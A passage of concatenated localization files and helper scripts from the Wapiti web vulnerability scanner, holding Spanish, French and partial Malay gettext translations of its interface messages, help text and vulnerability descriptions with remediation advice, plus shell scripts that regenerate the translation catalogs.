"Potentially dangerous file solution" msgstr "Asegúrese de que el script se encuentra actualizado y de que sus permisos son lo más restrictivos posible." msgid "Resource consumption description" msgstr "Al servidor le llevó más tiempo de lo normal el responder a una consulta. Un atacante puede utilizar esta debilidad como un arma para sobrecargar al sistema." msgid "Resource consumption solution" msgstr "El script en cuestión puede que esté utilizando los recursos (CPU, memoria, acceso de ficheros, base de datos…) de una manera ineficiente." msgid "SQL Injection description" msgstr "" "Las vulnerabilidades SQL permiten al atacante alterar las queries que son ejecutadas en la base de datos." "El atacante puede extraer o modificar la información de la base de datos o incluso obtener más privilegios en el sistema." msgid "SQL Injection solution" msgstr "" "Para protegerse de inyecciones SQL, los parámetros de usuario no se deben " "utilizar directamente para la crear la sentencia SQL. Esos parámetros se deben " "escapar o filtrar. Las consultas deben estar parametrizadas." wapiti-2.3.0+dfsg/wapitiCore/language_sources/file_list.txt000066400000000000000000000005671240201516300241010ustar00rootroot00000000000000../attack/attack.py ../attack/mod_backup.py ../attack/mod_blindsql.py ../attack/mod_crlf.py ../attack/mod_exec.py ../attack/mod_file.py ../attack/mod_htaccess.py ../attack/mod_nikto.py ../attack/mod_permanentxss.py ../attack/mod_sql.py ../attack/mod_xss.py ../net/getcookie.py ../net/cookie.py ../net/lswww.py ../report/txtreportgenerator.py ../vulnerability.py ../wapiti.py wapiti-2.3.0+dfsg/wapitiCore/language_sources/fr.po000066400000000000000000000702021240201516300223260ustar00rootroot00000000000000# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Evil url: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr "{0} dans {1} via une injection dans le paramètre {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " en provanance de {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} dans {1} via une injection dans la query string" #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} dans {1} via une injection dans le chemin de la ressource" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Paramètre en cause : {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Evil request:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "Injection SQL" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Injection SQL en aveugle" #: ../vulnerability.py:69 msgid "File Handling" msgstr "Divulgation de fichier" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Cross Site Scripting" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Exécution de commandes" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Contournement de htaccess" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Copie de sauvegarde" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Fichier potentiellement dangereux" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Erreur interne au serveur" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Consommation anormale de ressource" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Une erreur HTTP 500 a été obtenue avec {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Un délais d'attente dépassé a eu lieu avec {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans la query string" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le chemin de la ressource" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "La requête n'a pas aboutie (délais dépassé) lors de l'injection d'un payload dans le paramètre {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans la query string" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le chemin de la ressource" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "Le serveur a répondu par une erreur HTTP 500 lors de l'injection d'un payload dans le paramètre {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Argument invalide pour l'option {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Chargement des modules :" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "Aucun lien ni formulaire trouvé dans cette page !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Assurez-vous que l'URL est correcte." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Dépendances manquantes pour le module {0} :" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Lancement du module {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Scripts d'upload trouvés :" #: ../wapiti.py:335 msgid "Report" msgstr "Rapport" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Un rapport a été généré dans le fichier {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Ouvrez {0}/index.html dans un navigateur pour voir ce rapport." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Un scanneur de vulnérabilités pour applications web \n" " \n" " Mode d'emploi : python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Les options possibles sont les suivantes : \n" " -s \n" " --start \n" " \tCommencer le scan par l'url spécifiée. Cette option peut être appelée plusieurs fois.\n" " \tWapiti va explorer ces liens afin de trouver de nouvelles URLs même si c'est liens sont hors du périmètre de scan.\n" " \n" " -x \n" " --exclude \n" " \tPour exclure une url du scan (par exemple un script de déconnexion). Cette option peut être appelée plusieurs fois.\n" " \tL'usage de l'astérisque (*) est possible comme expression régulière basique.\n" " \tExemple : -x http://server/base/?page=*&module=test \n" " \tou -x http://server/base/admin/* pour exclure un répertoire \n" " \n" " -p \n" " --proxy \n" " \tSpécifier l'utilisation d'un proxy. Les types de proxies actuellement supportés sont HTTP et HTTPs.\n" " \tCette option peut être appelée deux fois afin d'indiquer le proxy HTTP ainsi que celui pour le HTTPS.\n" " \tExemple: -p http://proxy:port/ \n" " \n" " -c \n" " --cookie \n" " \tImporter des cookies à utiliser pour le scan. Le fichier conteneur de cookies doit être au format JSON.\n" " \tLes cookies peut être récupérés via l'utilisation des outils cookie.py et getcookie.py présents dans le dossier \"net\".\n" " \n" " -t \n" " --timeout \n" " \tDéfinir le temps d'attente (en secondes) d'une réponse du serveur pour une requête.\n" " \n" " -a \n" " --auth \n" " \tSpécifier des identifiants pour l'authentification HTTP \n" " \n" " --auth-method \n" " \tSi le serveur réclame une authentification, permet de spéficier la méthode d'authentification à utiliser.\n" " \tLes méthodes actuellement supportées sont (certaines nécessitent l'installation de module supplémentaires) :\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tRetirer un paramêtre (nom et valeur) de toutes les URLs.\n" " \n" " -n \n" " --nice \n" " \tDéfinir une limite pour le nombre d'URLs à traiter qui sont basées sur la même " "construction (càd, le nombre maximum de valeurs uniques pour un même paramètre). \n" " \tUtilisez cette option pour éviter d'entrer dans des boucles infinies lors du scan. \n" " \tCette valeur doit être supérieur à 0.\n" " \n" " -m \n" " --module \n" " \tDéfinir les modules et les méthodes HTTP associées à utiliser pour les " "attaques.\n" " \tPrécédez le nom d'un module par un tiret pour le désactiver.\n" " \tPour explorer la cible sans lancer la moindre attaque, désactivez tous les modules avec -m \"-all\".\n" " \tEn l'absence de méthodes HTTP spécifiées pour un module, GET et POST seront utilisés.\n" " \tExemple: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tUtiliser les couleurs du terminal pour mettre en valeur les vulnérabilités et anomalies.\n" " \n" " -v \n" " --verbose \n" " \tDéfinie le niveau de verbosité des résultats.\n" " \t0: silencieux (défaut), 1: affiche chaque url, 2: affiche chaque attaque.\n" " \n" " -b \n" " --scope \n" " \tDéfinir le périmètre du scan :\n" " \t\t+ page : analyser uniquement la page donnée en argument principal.\n" " \t\t+ folder : analyser toutes les pages trouvées sous l'arborescence passée comme URL (par défaut).\n" " \t\t+ domain : analyser toutes les pages trouvées pour le domaine correspondant à celui spécifié dans l'URL passée à Wapiti.\n" " \n" " -f \n" " --format \n" " \tDéfinir le format du rapport. \n" " \tjson: Rapport au format JSON \n" " \thtml: Rapport au format HTML (choix par défaut)\n" " \topenvas: Rapport au format XML OpenVAS \n" " \ttxt: Rapport au format texte simple (UTF-8) \n" " \tvulneranet: Rapport au format XML VulneraNET \n" " \txml: Rapport au format XML \n" " \n" " -o \n" " --output \n" " \tSpéficier l'emplacement du disque où enregistrer le rapport. \n" " \tSi le rapport est au format html, ce paramètre sera utilisé comme nom de répertoire. \n" " \n" " -i \n" " --continue \n" " \tReprendre une session de scan en chargeant le status sauvegardé dans le fichier XML spécifié.\n" " \tSi le paramètre est appelé sans argument, Wapiti charge la session depuis un fichier par défaut présent dans le dossier \"scans\".\n" " \n" " -k \n" " --attack \n" " \tLancer directement les attaques en chargeant les URLs présentes dans le fichier XML de status spécifié (sans relancer l'exploration des pages du site).\n" " \tSi le fichier n'est pas spécifié, Wapiti charge un fichier par défaut présent dans le dossier \"scans\".\n" " \n" " --verify-ssl <0|1>\n" " \tIndique à Wapiti s'il doit ou non vérifier les certificats SSL.\n" " \tLe comportement par défaut est de vérifieir les certificats.\n" " \n" " -h \n" " --help \n" " \tAfficher ce message d'aide\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Fichier {0} chargé. Wapiti va s'en servir pour effectuer l'attaque" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "erreur : {0} lors de l'attaque de {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "erreur: délais d'attente dépassé lors de l'attaque de {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} en provenance de {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Copie de sauvegarde trouvée !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Copie de sauvegarde {0} trouvée pour {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Faille d'injection SQL en aveugle" #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} via une injection dans la query string" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} via une injection dans le paramètre {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "Injection CRLF" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(QUERY_STRING)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Erreur : Le serveur n'a pas compris la requête" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Exécution de commande" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "Interprétation de code PHP" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Avertissement exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "Injection via preg_replace" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Avertissement usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Avertissement assert" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Avertissement d'une évaluation" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Faille d'inclusion distante" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Divulgation de fichiers sur un système Linux" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "Divulgation de fichiers sur un système BSD" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Divulgation de fichiers sur un système Window" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Divulgation de fichier présent dans le include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "Divulgation de fichier présent dans basedur vie highlight_file()" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "Inclusion d'un fichier présent dans le include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Eventuelle faille de type {0}" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "Protection par htaccess trouvée : {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "| Code HTTP : {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Code source :" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr "Disfonctionnement dans la protection .htaccess : {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "| Code HTTP : {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Un problème est survenu avec la base de données nikto locale" #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Téléchargement depuis le web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Erreur de téléchargement de la base Nikto" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Références" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Faille XSS permanent" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Un XSS permanent a été trouvé dans {0} avec {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Un XSS permanent a été trouvé en envoyant les champs {1} depuis {0}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "Injection MySQL" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Injection SQL sur système MS-Access" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "Injection MSSQL" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Injection SQL Java" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "Injection PostgreSQL" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "Injection XPath" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "Injection LDAP" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "Injection SQL DB2" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Injection SQL Interbase" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Injection SQL Sybase" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr "Injection SQL .NET" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Injection SQL Oracle" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "Faille XSS" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "Faille XSS trouvée via l'injection dans le chemin de la ressource" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "Faille XSS trouvée via l'injection dans la query string" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "Faille XSS trouvée via l'injection dans le paramètre {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "Aucun formulaire n'a été trouvé dans cette page !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Sélectionnez le formulaire que vous souhaitez utiliser :" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Entrez un numéro : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Veuillez renseignr les champs pour le formulaire suivant : " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Impossible d'atteindre l'URL {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "Le premier argument doit être l'URL racine !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Protocole invalide : {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Cet argument n'est pas un lien valide : {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Connexion refusée !" #: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Exception reçue dans lswww.browse : {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Fichier {0} chargé, le scan continue :" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs à explorer" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs explorées" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Le Fichier {0} n'a pas été trouvé, Wapiti va recommencer le scan du site" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Note" msgstr " Note" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Le scan a été sauvegardé dans le fichier {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Vous pouvez l'utiliser pour lancer de futures attaques sans avoir à relancer le scan via le paramètre \"-k\"" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been saved in the file {0}/{1}.xml" msgstr "Scan interrompu, les données ont été sauvegardées dans le fichier {0}/{1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Pour reprendre ce scan, vous pouvez lancer wapiti avec l'option \"-i\"" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Formulaires" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "Depuis: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "Vers: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Scripts d'upload" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Formulaires" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Formulaire {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Méthode : {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Intputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Selects:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * TextAreas:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Rapport pour {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Date du scan : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Portée de ce scan : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Résumé des vulnérabilités :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Evil request:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "PoC en commande cURL : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Anomalies rencontrées :" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Le processus d'attaque a été interrompu. Pour relancer l'attaque, lancez Wapiti avec les options \"-i\" ou \"-k\"" #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Le fichier {0} n'a pas été trouvé. Wapiti va scanner le site à nouveau" msgid "[!] Unable to find a module named {0}" msgstr "[!] Impossible de trouver le module {0}" msgid "Backup file description" msgstr "" "Il se peut que des copies de sauvegarde de scripts soient accessibles sur le " "serveur. L'administrateur web a du placer volontairement une sauvegarde dans " "l'idée de revenir à une précédente version ou involontairement en utilisant " "un éditeur configuré pour sauver automatiquement une copie après une " "certaine durée.Ces fichiers peuvent révéler des informations intéressantes " "comme du code source ou encore des identifiants (accès à la base de données)." msgid "Backup file solution" msgstr "" "L'administrateur web doit supprimer manuellement les sauvegardes présentes " "sous la racine web et reconfigurer l'éditeur qu'il utilise pour désactiver " "les sauvegardes automatiques." msgid "Blind SQL Injection description" msgstr "" "Tout comme les failles d'injection SQL classiques, les injections SQL en aveugle " "permettent à un attaquant d'altérer les requêtes normalement exécutées sur la " "base de données. Ce type de vulnérabilité est plus difficile à détecter en raison " "de l'absence de messages d'erreur renvoyés par l'application web." msgid "Blind SQL Injection solution" msgstr "" "Pour se protéger des injections SQL, les données fournies par les " "utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes " "SQL mais doivent faire l'objet de vérifications (filtres, échappements) " "approfondies." msgid "Commands execution description" msgstr "" "Ce type d'attaque consiste à faire exécuter des commandes sur le serveur. " "L'attaquant tente d'injecter les commandes dans les paramêtres de requêtes " "qui lui sont accessibles." msgid "Commands execution solution" msgstr "Ce type de vulnérabilité résulte souvent d'un manque de vérifications " "sur les données soumises par le visiteur. Pour les opérations sur les accès fichiers " "il est préférable d'utiliser des appels systèmes spécialisés au lieu de tenter " "de faire exécuter des commandes shell." msgid "CRLF description" msgstr "" "Le terme CRLF fait référence à Carriage Return (ASCII 13, \\r) Line Feed " "(ASCII 10, \\n). Dans le protocole HTTP, ces deux caractères à la suite " "permettent entre autres de passer à la ligne d'entête suivante." "" "Un script qui insère directement dans ses entêtes des données fournies par " "l'utilisateur peut alors se voir injecter des lignes d'entêtes qui seront " "interprétées par le navigateur de la victime." msgid "CRLF solution" msgstr "" "Vérifiez que les couples nom / valeur retournés dans les entêtes HTTP ne " "contiennent pas la suite de caractères CRLF." msgid "Cross Site Scripting description" msgstr "" "Le Cross-site scripting (XSS) est une catégorie de vulnérabilités web qui " "permet d'exécuter du code dans le navigateur des visiteurs du site. Leur " "exploitation peut par exemple permettre le détournement d'une session qui a " "été ouverte sur un site par un utilisateur valide." msgid "Cross Site Scripting solution" msgstr "" "Afin de se protéger des attaques XSS, il faut s'assurer que les données " "retournées dans une page ne contiennent pas certains caractères interprétés " "par le navigateur." "" "Certains caractères considérés dangereux peuvent " "être remplacés par leur code d'entité HTML." msgid "File Handling description" msgstr "" "Ces techniques permet à l'attaquant d'accèder à des fichiers auxquels il " "n'est pas sensé accèder car en dehors de la racine du serveur web. En " "utilisant certaines séquences comme '../', il peut remonter dans " "l'arborescence pour ainsi lister des répertoires ou obtenir le contenu de " "fichiers." msgid "File Handling solution" msgstr "" "Ne laissez pas aux utilisateurs la possibilité de choisir une ou plusieurs " "parties du nom d'un fichier ou d'un répertoire. Générez vous même des noms " "aléatoire en cas de création ou utilisez des correspondances en cas de " "templates (un ID numérique correspondant à une chaine de caractères. " "Utilisez des jails chroot et des restrictions d'accès pour limiter le " "nombre de fichiers accessibles par le serveur." msgid "Htaccess bypass description" msgstr "" "Les fichiers htaccess permettent de restreindre l'accès a des fichiers ou " "répertoires en fonction d'identifiants ou méthode HTTP utilisés. Si la " "configuration a été mal faite il peut être possible de contourner la " "restriction." msgid "Htaccess bypass solution" msgstr "" "La configuration du htaccess doit être minutieusement vérifiée pour ne pas " "laisser une porte d'entrée à un éventuel attaquant." msgid "Internal server error description" msgstr "" "Erreur interne au serveur. Le serveur a fait face à une situation inattendue " "qui l'a empêché de traiter convenablement la requête. Cela peut être le signe de " "la présence d'une vulnérabilité." msgid "Internal server error solution" msgstr "Les logs de votre serveur HTTP ou de l'application web concernée devraient " "vous renseigner sur la nature exacte du problème." msgid "Potentially dangerous file description" msgstr "" "Certains scripts sont connus pour être potentiellement vulnérables et " "dangereux. Des listes de tels fichiers existent et sont fréquemment " "utilisées par des attaquants pour scanner des sites Internet à la recherche " "de ces vulnérabilitées." msgid "Potentially dangerous file solution" msgstr "" "L'administrateur devrait vérifier régulièrement si des mises à jour sont " "disponibles pour les scripts et logiciels utilisés sur le serveur. Il est " "aussi conseillé de se tenir informé sur les nouvelles vulnérabilités " "trouvées en s'abonnant à des listes de sécurité ou en suivant des flux RSS " "spécialisés." msgid "Resource consumption description" msgstr "Il a fallu un temps anormallement long au serveur pour traiter la reqêquete. " "Un attaquant pourrait exploiter ce type de faiblesse pour surcharger le serveur." msgid "Resource consumption solution" msgstr "Le script en cause utilise probablement certaines ressources système " "(CPU, mémoire, accès disque etc) de façon inneficace. Son améliorations devrait " "être étudiée." msgid "SQL Injection description" msgstr "" "Les failles d'injection SQL permettent à un attaquant de modifier les requêtes qui sont " "normalement exécutées sur le système de base de données. Un attaquant peut alors parvenir " "à extraire où à modifier des informations en base. Cela peut aussi potentiellement permettre " "à l'attaquant d'augmenter ses privilèges sur le système." msgid "SQL Injection solution" msgstr "" "Pour se protéger des injections SQL, les données fournies par les " "utilisateurs ne doivent pas être utilisées telles-quelles dans les requêtes " "SQL mais doivent faire l'objet de vérifications (filtres, échappements) " "approfondies." wapiti-2.3.0+dfsg/wapitiCore/language_sources/generateSources.sh000077500000000000000000000016161240201516300250570ustar00rootroot00000000000000xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o de.po -f file_list.txt -j xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o en.po -f file_list.txt -j xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o es.po -f file_list.txt -j xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o fr.po -f file_list.txt -j xgettext --copyright-holder="2009-2013 Nicolas SURRIBAS" --package-name="Wapiti" --package-version="SVN" --from-code=UTF-8 -L Python --no-wrap -d wapiti -o ms.po -f file_list.txt -j wapiti-2.3.0+dfsg/wapitiCore/language_sources/generateTranslations.sh000077500000000000000000000011301240201516300261040ustar00rootroot00000000000000rm ../config/language/de/LC_MESSAGES/wapiti.mo 2> /dev/null rm ../config/language/fr/LC_MESSAGES/wapiti.mo 2> /dev/null rm ../config/language/en/LC_MESSAGES/wapiti.mo 2> /dev/null rm ../config/language/es/LC_MESSAGES/wapiti.mo 2> /dev/null rm ../config/language/ms/LC_MESSAGES/wapiti.mo 2> /dev/null msgfmt de.po -o ../config/language/de/LC_MESSAGES/wapiti.mo msgfmt fr.po -o ../config/language/fr/LC_MESSAGES/wapiti.mo msgfmt en.po -o ../config/language/en/LC_MESSAGES/wapiti.mo msgfmt es.po -o ../config/language/es/LC_MESSAGES/wapiti.mo msgfmt ms.po -o ../config/language/ms/LC_MESSAGES/wapiti.mo wapiti-2.3.0+dfsg/wapitiCore/language_sources/ms.po000066400000000000000000000662411240201516300223460ustar00rootroot00000000000000# Copyright (C) YEAR 2009-2013 Nicolas SURRIBAS # This file is distributed under the same license as the Wapiti package. # #, fuzzy msgid "" msgstr "" "Project-Id-Version: Wapiti SVN\n" "Report-Msgid-Bugs-To: \n" "POT-Creation-Date: 2013-08-25 17:33+0200\n" "PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" "Last-Translator: FULL NAME \n" "Language-Team: LANGUAGE \n" "Language: \n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" #: ../vulnerability.py:23 msgid " Evil url: {0}" msgstr " Pautan berbahaya: {0}" #: ../vulnerability.py:24 msgid "{0} in {1} via injection in the parameter {2}" msgstr 